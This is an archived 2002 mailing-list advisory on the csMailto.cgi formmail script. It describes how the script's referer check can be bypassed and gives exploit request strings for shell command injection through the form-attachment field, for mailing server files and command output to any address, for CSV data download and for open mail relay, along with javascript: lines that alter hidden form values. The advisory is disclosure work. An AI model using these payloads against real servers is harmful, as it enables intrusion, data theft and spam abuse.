OSEC

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
 
From: Steve Gustin (stegus1yahoo.com)
Date: Tue Apr 23 2002 - 15:02:17 CDT

  • Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

    CGIscript.net - csMailto.cgi - Remote Command
    Execution
    ---------------------------------------------------------------------

    Name : CGIscript.net - csMailto.cgi - Remote
    Command Execution
    Date : April 23, 2002
    Product : csMailto
    Vuln Type : Access Validation Error
    Severity : HIGH RISK

    Vendor : WWW.CGIscript.NET, LLC.
    Homepage : http://www.cgiscript.net/

    DISCUSSION:
    ---------------------------------------------------------------------
    csMailto is a perl cgi formmail script developed by
    Mike Barone and Andy Angrick of CGIscript.net. From
    the website "(csMailto is) an automated script that
    allows the user to build and manage multiple mailto
    forms to use within your web site. Build your own
    mailto forms without having to learn Perl. It also can
    send and receive files!".

    The script stores all its configuration data in hidden
    form fields, relying on the user to accurately (and
    honestly) echo that information back with each form
    submission. The only thing allowing a user from
    having complete control over the script is a referer
    check which is easily bypassed.

    Because of this and other problems, the script is
    subject to the following attacks:
    - execute commands on server
    - execute command on server and mail output to anyone
    - email server files to anyone
    - downloading of logged form input (in CSV format)
    - use of form to send email to anyone

    EXPLOIT:
    ---------------------------------------------------------------------
    Because the script stored all the form configuration
    data in hidden fields in the actual form, once a user
    can bypass the referrer check they can essentially do
    anything an administrator of the program could do,
    plus some additional things that probably weren't
    intended.

    The script doesn't even check for the full referrer,
    it only checks for the presence of the server hostname
    in the referral your send. For example, if the script
    is http://host.com/cgi-script/CSMailto/CSMailto.cgi
    then it will look for "host.com" in the referer.

    This method is inherently insecure and can be bypassed
    by:

    - Creating a perl LWP script which could specify an
    arbitrary referrer.

    - Using javascript or other means to modify the form
    values on the generated CSMailto form and allowing the
    browser to send the original (and valid) URL as a
    referrer.

    - Creating a local form page with the target hostname
    in the path and thus the referrer that is sent when in
    the form is submitted (eg: C:\html\host.com\form.html)

    - Creating a local html page with a simple link (see
    below) and the target hostname in the path and thus in
    the referrer that is sent when the link is clicked
    (eg: C:\html\host.com.html)

    Some example exploits are as follows. Note, these all
    assume that the referrer check was bypassed with one
    of the above methods.

    - execute commands on server
     
    CSMailto.cgi?form-attachment=SHELL_COMMANDS_HERE|&command=mailform

    - execute command on server and mail output to anyone
     
    CSMailto.cgi?form-attachment=SHELL_COMMANDS_HERE|&Email=userhost.com&form-autoresponse=YES&command=mailform

    - email server file to anyone
     
    CSMailto.cgi?form-attachment=FILEPATH_HERE&Email=userhost.com&form-autoresponse=YES&command=mailform

    - download/access form input (no referer check)
      CSMailto has the option to "have the feedback
    exported to an external file". These files
      are stored in CSV format and can be downloaded from:
      CSMailto/export/FORM_NAME.csv

      Form HTML files are often named after their form
    names and the information is also stored in hidden
    fields in the actual form like so
    "...formname=FORM_NAME...". Also, it's worth noting
    that the script doesn't properly escape '"', ',', or
    nextline ("\n") chars, so any CSV data with those
    characters may get corrupted.

    - use form to send email to anyone
     
    CSMailto.cgi?form-to=tohost.com&form-from=fromhost.com&form-subject=subject&form-results=body&command=mailform

    Another example of the seriousness of this problem, as
    mentioned above, you can simply load an existing
    CSMailto form and have your browser (IE in this
    example) change some of the preset hidden form values
    and then click submit. Example:

    - email server file to anyone
     
    javascript:alert(document.forms[0]["form-attachment"].value="FILEPATH");
     
    javascript:alert(document.forms[0]["form-autoresponse"].value="YES");
     
    javascript:alert(document.forms[0]["Email"].value="userhost.com");

    IMPACT:
    ---------------------------------------------------------------------
    Because of the high number of users who are using
    CGIscript.net scripts (over 17,000 csSearch users
    alone according to the website) and the fact that
    search engines can easily be used to identify sites
    with the unique "csMailto.cgi" script name, the risk
    posed by these flaws is very high indeed.

    SOLUTION
    ---------------------------------------------------------------------
    Vendor was notified on Apr 5, 2002 of the problem but
    has not yet released a fix.

    Affected parties may want to consider switching to a
    free replacement such as
    "nms formmail" which can be found at
    http://nms-cgi.sourceforge.net/scripts.shtml

    VENDOR HISTORY:
    ---------------------------------------------------------------------
    April 8, 2002 - csGuestbook.cgi, csLiveSupport.cgi,
    csNewsPro.cgi, csChatRBox.cgi - Remote Code Execution
    http://online.securityfocus.com/archive/1/266432

    March 25, 2002 - csSearch.cgi - Remote Code Execution
    http://online.securityfocus.com/archive/1/264169

    DISCLAIMER
    ---------------------------------------------------------------------
    The information within this document may change
    without notice. Use of this information constitutes
    acceptance for use in an AS IS condition. There are NO
    warranties with regard to this information. In no
    event shall the author be liable for any consequences
    whatsoever arising out of or in connection with the
    use or spread of this information. Any use of this
    information lays within the user's responsibility.

    FEEDBACK:
    ---------------------------------------------------------------------
    If anyone has any other CGIscript.net scripts they'd
    like me to take a look at, just drop me a line at
    stegus1yahoo.com.

    __________________________________________________
    Do You Yahoo!?
    Yahoo! Games - play chess, backgammon, pool and more
    http://games.yahoo.com/